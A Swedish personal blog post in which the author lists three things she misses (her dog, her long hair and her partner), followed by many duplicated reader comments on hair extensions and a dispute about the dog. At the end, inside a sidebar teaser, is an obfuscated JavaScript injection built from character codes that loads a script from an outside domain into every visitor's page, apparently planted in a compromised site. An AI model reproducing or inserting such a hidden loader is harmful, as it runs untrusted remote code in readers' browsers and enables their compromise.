Tre saker jag saknar just nu….

image

Hej! Idag har jag vandrat runt på Stockholms gator. Vilket väder! Detta måste vara den bästa hösten på år?! =)  Kolla in min Sture. Det är någonting me honom och väskor?… sötnöt!imageTill lunch blev det majskyckling, glasnudlar och sky sås.På ett av mina favorit ställen, Cafè Saturnus. -SÅ gott! 

OLYMPUS DIGITAL CAMERA

Tre saker jag VERKLIGEN saknar, just nu:

Min hund, min bästa vän…. ”gammeltackan” Tezz!

Hon har under hela min utbildning varit nere på Öland hos reserv husse Farbror Lothar. Jag saknar henne ETREMT mycket. Men hon har haft det bättre där nere på landet,  just under utbildningen <3

Men efter den 18:e då kommer hon hem till mig Lilleman och Sture <3 Som jag längtar!

DÅ är familjen komplett! imageJag saknar mitt långa hår! Det känns så mycket jag mer ”jag” Det är så bekvämt att bara sätta upp det utan att styla det. Jag veeet att majoriteten nu säker kommer att protestera… men jag saknar det faktiskt.

Vad tycker du? Ska jag sätta i extensions igen? ja eller nej?imageJag saknar min Lilleman! Jag känner mig lixom inte hel utan honom! Jag fungerar SÅ mycket bättre när han är hemma, jag sover bättre, jag blir mer effektiv, jag är lyckligare =)

 Han är fortfarande febrig och krasslig men lite bättre…. <3  imageNu ska jag faktiskt sova. Sista veckan i skolan nu innan det är en  veckas hemmastudier och plugg innan slut-tentan… Nu gäller det! Kram och gonatt… / My Martens

PS: Sista timmarna med 25% hos inreda.com

–> –> –>  HÄR <– <– <–

DSC_0418-INREDACOM-17AR-gron34Jag glömde ju visa.. Hittade en gammal antik ram som jag köpte med mig hem. Jag satte i ett av mina favorit kort på mig och Lilleman <3 Visst blev det fint? 🙂image

70 Komentarer

 1. Skit i extensions, dvs löshår på svenska;) Tycker du ska raka bort allt hår på sidorna och ha en tuppkam, hade passat dig som handen handsken, tror du skulle behöver en förändring och släppa alla ytligheter. Min åsikt, väl menat:) Kram

 2. Angående löshår så säger jag Nej, men du ska alltid lyssna på dej själv och det du känner dig fin i är det som bör gälla tänker jag.
  Du är en så fin ung, drivande och go tjej. Fortsätt att vara underbara du!

 3. Jag gjorde som dig, dvs tog bort mina hairtalk har haft keratin tidigare men bytte till hairtalk vilket inte alls passade mig tyvärr, jag skötte dem precis som jag skulle med rätt schampo,balsam och ALLT men de löstes upp flera gånger så jag tänkte vänta och ha mitt hår som blivit rätt långt men jag orkar inte heller styla och greja så jag ska sätta in extenstions igen, då kastar jag upp det i en tofs eller slarvig knut… mitt egna känns så tunt… Du är jättefin i ditt hår men jag förstår dilemmat. Känns ju helt ok att få ha såna här I-landsproblem en tisdagskväll efter Svenska Hollywoodfruar på tv´n ? Hoppas att Ludvig kryar på sig,givetvis så tycker man som mamma att man är den enda som kan ta hand om sitt barn speciellt då det är sjukt men det verkar ju gå bra mellan exet o fam. och dej numer och det vinner ju främst Ludvig på och bara det ger ju lite bättre nattsömn.

 4. Skit i extensions, dvs löshår på svenska;) Tycker du ska raka bort allt hår på sidorna och ha en tuppkam, hade passat dig som handen handsken, tror du skulle behöver en förändring och släppa alla ytligheter. Min åsikt, väl menat:) Kram

 5. Angående löshår så säger jag Nej, men du ska alltid lyssna på dej själv och det du känner dig fin i är det som bör gälla tänker jag.
  Du är en så fin ung, drivande och go tjej. Fortsätt att vara underbara du!

 6. Jag gjorde som dig, dvs tog bort mina hairtalk har haft keratin tidigare men bytte till hairtalk vilket inte alls passade mig tyvärr, jag skötte dem precis som jag skulle med rätt schampo,balsam och ALLT men de löstes upp flera gånger så jag tänkte vänta och ha mitt hår som blivit rätt långt men jag orkar inte heller styla och greja så jag ska sätta in extenstions igen, då kastar jag upp det i en tofs eller slarvig knut… mitt egna känns så tunt… Du är jättefin i ditt hår men jag förstår dilemmat. Känns ju helt ok att få ha såna här I-landsproblem en tisdagskväll efter Svenska Hollywoodfruar på tv´n 😀 Hoppas att Ludvig kryar på sig,givetvis så tycker man som mamma att man är den enda som kan ta hand om sitt barn speciellt då det är sjukt men det verkar ju gå bra mellan exet o fam. och dej numer och det vinner ju främst Ludvig på och bara det ger ju lite bättre nattsömn.

 7. Säger nej helt klart. För det första mycket snyggare kort och för det andra så skulle jag ha mer förtroende för en PT som är naturlig än en PT med alltför mycket fejkat utseende, naglar, ögonbryn, hår, botox etc etc – en PT ska ju vilja göra gott för kroppen – så för mig rimmar det illa med allt skönhetsfixande. En kropp som mår bra ska man väl inte hålla på att göra om?!

 8. Sätt i löshår igen. Mycket snyggare med långt, helt klart. Tycker alla ser äldre och tråkigare ut med kort hår. Många vill nog ha långt men har inte råd med löshår.

 9. Säger nej helt klart. För det första mycket snyggare kort och för det andra så skulle jag ha mer förtroende för en PT som är naturlig än en PT med alltför mycket fejkat utseende, naglar, ögonbryn, hår, botox etc etc – en PT ska ju vilja göra gott för kroppen – så för mig rimmar det illa med allt skönhetsfixande. En kropp som mår bra ska man väl inte hålla på att göra om?!

 10. Sätt i löshår igen. Mycket snyggare med långt, helt klart. Tycker alla ser äldre och tråkigare ut med kort hår. Många vill nog ha långt men har inte råd med löshår.

 11. Nej nej absolut nej, sätt inte i löshår, du är mycket mycket finare som du är nu, dessutom passar du bäst i uppsatt hår, det kan du ha nu utan löshår, när du har uppsatt hår kommer dina ögonbryn fram mera och dina ögon, du har aldrig varit så snygg som nu.

 12. Hej!
  Jag förstår känslan vad gäller löshår. Har själv precis tagit ut mitt efter lång tid med håret. Jag kände mig tom i början. Kändes inte som ”jag”. Jag har idag lite längre än till axlarna och har satt i hårförtjockning (samma längd som mitt egna). Jag är super nöjd och använder HAirtalk. Kanske nåt för dig? Jag tycker du ska gå på din egna känsla My, man brukar bli vackrast i det man själv vill ha och när man går på ”magkänslan”. Du är vacker på insidan vilket syns på utsidan – med eller utan löshår. Kram på dig!

 13. Nej nej absolut nej, sätt inte i löshår, du är mycket mycket finare som du är nu, dessutom passar du bäst i uppsatt hår, det kan du ha nu utan löshår, när du har uppsatt hår kommer dina ögonbryn fram mera och dina ögon, du har aldrig varit så snygg som nu.

 14. Hej!
  Jag förstår känslan vad gäller löshår. Har själv precis tagit ut mitt efter lång tid med håret. Jag kände mig tom i början. Kändes inte som ”jag”. Jag har idag lite längre än till axlarna och har satt i hårförtjockning (samma längd som mitt egna). Jag är super nöjd och använder HAirtalk. Kanske nåt för dig? Jag tycker du ska gå på din egna känsla My, man brukar bli vackrast i det man själv vill ha och när man går på ”magkänslan”. Du är vacker på insidan vilket syns på utsidan – med eller utan löshår. Kram på dig!

 15. Gör det som DU mår bäst av. Skit i vad andra tycker?
  Tycker du är fin i båda men röstar på löshår, fast inte för långt el för mycket. Man kan faktiskt ha löshår som ser fräsht och naturlugt ut?
  Men som sagt, gör det som känns rätt för dig! Kram❤

 16. Gör det som DU mår bäst av. Skit i vad andra tycker😉
  Tycker du är fin i båda men röstar på löshår, fast inte för långt el för mycket. Man kan faktiskt ha löshår som ser fräsht och naturlugt ut👍
  Men som sagt, gör det som känns rätt för dig! Kram❤

 17. Röstar på att du låter det vara som det är, tycker det ser mycket finare ut. Dessutom mycket mera ”nu” än hårförlängning. Känns lite som att hårförlängningarnas bäst före-datum passerat med rejäl marginal…
  Att göra det lite tjockare (men inte längre) kunde ju vara en idé, lite mitt emellan liksom.

 18. En som varit kompis med dig, säger att du stängde in din stackars hund i bilen i flera timmar? Hur mycket problem har du egentligen? Detta gör mig så fruktansvärt ledsen. Låt hunden stanna hos den gamle mannen!!

  • Jag hörde att du låste in din mamma i garderoben… Huva så läskigt! Jag hörde också att miljöpartiet reste till månen för att plocka svamp. Usch vilken kostnad för staten! ”Jag hörde, jag hörde att hon sa, stt han sagt” men vad vet du egentligen?

   • Förvånar mig inte alls om du låst in din mamma i garderoben? För kan man ha hunden i bilen mer eller mindre en hel dag så kan nog det oxå stämma. Hoppas jag slipper se i dina inlägg framöver att du har hunden hemma hos dig. Finns inget som gör mig så upprörd när djur blir lidande av sin ägare!

 19. Röstar på att du låter det vara som det är, tycker det ser mycket finare ut. Dessutom mycket mera ”nu” än hårförlängning. Känns lite som att hårförlängningarnas bäst före-datum passerat med rejäl marginal…
  Att göra det lite tjockare (men inte längre) kunde ju vara en idé, lite mitt emellan liksom.

 20. En som varit kompis med dig, säger att du stängde in din stackars hund i bilen i flera timmar? Hur mycket problem har du egentligen? Detta gör mig så fruktansvärt ledsen. Låt hunden stanna hos den gamle mannen!!

  • Jag hörde att du låste in din mamma i garderoben… Huva så läskigt! Jag hörde också att miljöpartiet reste till månen för att plocka svamp. Usch vilken kostnad för staten! ”Jag hörde, jag hörde att hon sa, stt han sagt” men vad vet du egentligen?

   • Förvånar mig inte alls om du låst in din mamma i garderoben😱 För kan man ha hunden i bilen mer eller mindre en hel dag så kan nog det oxå stämma. Hoppas jag slipper se i dina inlägg framöver att du har hunden hemma hos dig. Finns inget som gör mig så upprörd när djur blir lidande av sin ägare!

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/